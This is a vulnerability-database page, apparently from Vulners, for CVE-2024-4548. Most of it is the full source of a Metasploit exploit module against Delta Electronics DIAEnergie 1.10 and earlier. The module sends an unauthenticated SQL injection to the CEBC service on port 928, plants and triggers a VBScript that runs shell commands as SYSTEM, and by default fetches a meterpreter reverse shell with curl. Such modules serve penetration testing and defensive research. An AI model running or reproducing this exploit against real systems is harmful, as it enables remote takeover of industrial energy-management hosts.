Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

DIAEnergie SQL Injection (CVE-2024-4548)

🗓️ 21 Aug 2024 18:52:10Reported by Michael Heinzl, TenableType 
metasploit
 metasploit🔗 www.rapid7.com👁 308 Views

SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics. Exploitable by an unauthenticated remote attacker to gain arbitrary code execution

Related
Code
ReporterTitlePublishedViews
Family
0day.today		DIAEnergie 1.10 SQL Injection Exploit
22 Aug 202400:00
zdt
Circl		CVE-2024-4548
21 Aug 202414:03
circl
CNNVD		Delta Electronics DIAEnergie SQL注入漏洞
6 May 202400:00
cnnvd
CNVD		Delta Electronics DIAEnergie SQL Injection Vulnerability (CNVD-2024-29663)
10 May 202400:00
cnvd
CVE		CVE-2024-4548
6 May 202413:51
cve
Cvelist		CVE-2024-4548 Delta Electronics DIAEnergie SQL Injection
6 May 202413:51
cvelist
NVD		CVE-2024-4548
6 May 202414:15
nvd
OSV		CVE-2024-4548
6 May 202414:15
osv
Packet Storm		DIAEnergie 1.10 SQL Injection
22 Aug 202400:00
packetstorm
Packet Storm		DIAEnergie 1.10 SQL Injection
4 Mar 202500:00
packetstorm
Rows per page
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::Tcp
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'DIAEnergie SQL Injection (CVE-2024-4548)',
        'Description' => %q{
          SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics.
          This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. The commands will get executed in the context of NT AUTHORITY\SYSTEM.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Michael Heinzl', # MSF exploit
          'Tenable' # Discovery & PoC
        ],
        'References' => [
          [ 'URL', 'https://www.tenable.com/security/research/tra-2024-13'],
          [ 'CVE', '2024-4548']
        ],
        'DisclosureDate' => '2024-05-06',
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows_Fetch',
            {
              'Arch' => [ ARCH_CMD ],
              'Platform' => 'win',
              'DefaultOptions' => {
                'FETCH_COMMAND' => 'CURL',
                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'
              },
              'Type' => :win_fetch
            }
          ]
        ],
        'DefaultTarget' => 0,

        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(928)
      ]
    )
  end

  # Determine if the DIAEnergie version is vulnerable
  def check
    begin
      connect
      sock.put 'Who is it?'
      res = sock.get || ''
    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
      vprint_error(e.message)
      return Exploit::CheckCode::Unknown('Connection failed')
    ensure
      disconnect
    end

    if res.empty?
      vprint_status('Received an empty response.')
      return Exploit::CheckCode::Unknown('Received an empty response')
    end

    vprint_status('Who is it response: ' + res.to_s)
    version_pattern = /\b\d+\.\d+\.\d+\.\d+\b/
    version = res.match(version_pattern)

    if version.nil?
      return Exploit::CheckCode::Detected('DIAEnergie service detected but could not determine version')
    end

    vprint_status('Version retrieved: ' + version[0])

    unless Rex::Version.new(version[0]) <= Rex::Version.new('1.10.1.8610')
      return CheckCode::Safe("Version #{version[0]} is not vulnerable")
    end

    return CheckCode::Appears("Version #{version[0]} appears vulnerable")
  end

  def exploit
    execute_command(payload.encoded)
  end

  def execute_command(cmd)
    scname = Rex::Text.rand_text_alphanumeric(5..10).to_s
    vprint_status('Using random script name: ' + scname)

    year = rand(2024..2026)
    month = sprintf('%02d', rand(1..12))
    day = sprintf('%02d', rand(1..29))
    random_date = "#{year}-#{month}-#{day}"
    vprint_status('Using random date: ' + random_date)

    hour = sprintf('%02d', rand(0..23))
    minute = sprintf('%02d', rand(0..59))
    second = sprintf('%02d', rand(0..59))
    random_time = "#{hour}:#{minute}:#{second}"
    vprint_status('Using random time: ' + random_time)

    # Inject payload
    begin
      print_status('Sending SQL injection...')
      connect
      vprint_status("RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--")
      sock.put "RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--"
      res = sock.get
      unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'
        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)
      end

      vprint_status('Injection - Expected response received: ' + res.to_s)
      disconnect

      # Trigger
      print_status('Triggering script execution...')
      connect
      sock.put "RecalculateScript~#{random_date} #{random_time}~#{random_date} #{random_time}~1"
      res = sock.get
      unless res.to_s == 'Recalculate Script Start!'
        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)
      end
      vprint_status('Trigger - Expected response received: ' + res.to_s)

      disconnect

      print_good('Script successfully injected, check thy shell.')
    ensure
      # Cleanup
      print_status('Cleaning up database...')
      connect
      sock.put "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='#{scname}';--"
      res = sock.get
      unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'
        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)
      end
      vprint_status('Cleanup - Expected response received: ' + res.to_s)

      disconnect
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Jun 2026 19:01Current
9.7High risk
Vulners AI Score9.7
CVSS 3.19.8
EPSS0.48376
SSVC
sql injectiondiaenergiedelta electronicsremote attackerarbitrary code executionunauthenticatedvulnerability
308